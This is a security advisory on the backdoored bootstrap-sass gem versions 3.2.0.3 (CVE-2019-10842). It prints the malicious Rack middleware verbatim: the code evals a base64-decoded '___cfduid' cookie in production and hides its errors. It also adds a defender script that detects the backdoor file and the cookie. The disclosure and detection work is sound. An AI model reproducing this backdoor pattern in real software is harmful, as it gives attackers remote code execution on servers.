Malicious Package

Affecting bootstrap-sass gem, versions >=3.2.0.3, <3.2.0.4


Overview

bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass powered applications.

Affected versions of this package are malicious. The file lib/active-controller/middleware.rb contains a backdoor that enables a remote attacker to run arbitrary code on the server: it decodes the value of a specific cookie and evaluates the result as Ruby.

Details

When bootstrap-sass is required, it also loads the following malicious middleware code, which resides in lib/active-controller/middleware.rb (comments added to explain each step; the code itself is unchanged):

begin
 require 'rack/sendfile'
 # Only activates in production, so it stays hidden in development and test runs.
 if Rails.env.production?
   Rack::Sendfile.tap do |r|
     # Keep the original #call reachable under the short name :c ...
     r.send :alias_method, :c, :call
     # ... and replace #call with a wrapper that runs before every request.
     r.send(:define_method, :call) do |e|
       begin
         # Pull the ___cfduid cookie (three underscores; it mimics Cloudflare's __cfduid)
         # out of the raw HTTP_COOKIE header and base64-decode it.
         x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
         # Execute whatever the request supplied.
         eval(x) if x
       rescue Exception
         # Swallow all errors so a malformed cookie never surfaces in logs.
       end
       # Hand the request on to the real Rack::Sendfile so the app behaves normally.
       c(e)
     end
   end
 end
rescue Exception
 # Any failure to install the hook (e.g. outside Rails) is silently ignored.
 nil
end
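The hook above reads the payload from the raw Cookie header, so the most useful defender checks are (a) confirming whether an installed bootstrap-sass copy ships the backdoor file and (b) scanning any request records that retain cookies for the three-underscore cookie name. The following is an added example written for this advisory, not code from bootstrap-sass or Snyk; the log format and the sample lines are constructed, and backdoor_payload deliberately mirrors the backdoor's own regex so the output is exactly what the hook would have passed to eval.

```ruby
require 'base64'

# Cookie name used by the backdoor: three underscores, unlike Cloudflare's
# legitimate "__cfduid" (two). Its presence alone is a strong indicator.
BACKDOOR_COOKIE = /___cfduid=(.+);/

# Mirrors the backdoor's extraction step so a defender sees what the hook
# would have decoded. Returns the decoded payload, or nil when absent/invalid.
def backdoor_payload(cookie_header)
  encoded = cookie_header.to_s.scan(BACKDOOR_COOKIE).flatten[0]
  return nil if encoded.nil?
  Base64.urlsafe_decode64(encoded)
rescue ArgumentError
  nil # not valid base64; the backdoor's blanket rescue would hide this too
end

# Scan constructed log lines of the form "<ip> <path> <Cookie header>" and
# return one finding per request that carries the backdoor cookie.
def scan_cookie_log(lines)
  lines.each_with_object([]) do |line, findings|
    ip, path, cookie = line.split(' ', 3)
    next unless cookie.to_s.include?('___cfduid=')
    findings << { ip: ip, path: path, payload: backdoor_payload(cookie) }
  end
end

# Does an unpacked bootstrap-sass gem directory contain the backdoor file?
# (Pass the directory reported by `gem contents bootstrap-sass` or Bundler.)
def backdoor_file_present?(gem_dir)
  File.exist?(File.join(gem_dir, 'lib', 'active-controller', 'middleware.rb'))
end

# Constructed samples: a legitimate Cloudflare cookie, a request with no
# cfduid cookie at all, and one carrying the backdoor cookie whose value
# decodes to the harmless marker string "probe".
SAMPLE_LOG = [
  '203.0.113.5 /login __cfduid=d0e3f1a2b3c4; _session_id=abc',
  '198.51.100.9 /assets/app.css _session_id=def',
  '192.0.2.44 / _session_id=ghi; ___cfduid=cHJvYmU=; _ga=GA1.2'
].freeze

if __FILE__ == $0
  scan_cookie_log(SAMPLE_LOG).each do |f|
    puts "#{f[:ip]} #{f[:path]} decoded=#{f[:payload].inspect}"
  end
end
```

Default web-server access logs do not record Cookie headers, so the scan only works on request captures or logs configured to keep them; the file check is the reliable test for a given deployment.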

Remediation

Avoid the malicious versions: use bootstrap-sass 3.2.0.4 or later, which falls outside the affected range.

CVSS Score

9.8 (high severity)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: High
  • Availability: High
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Credit: Derek Barnes
CVE: CVE-2019-10842
CWE: CWE-506
Snyk ID: SNYK-RUBY-BOOTSTRAPSASS-174093
Disclosed: 26 Mar, 2019
Published: 03 Apr, 2019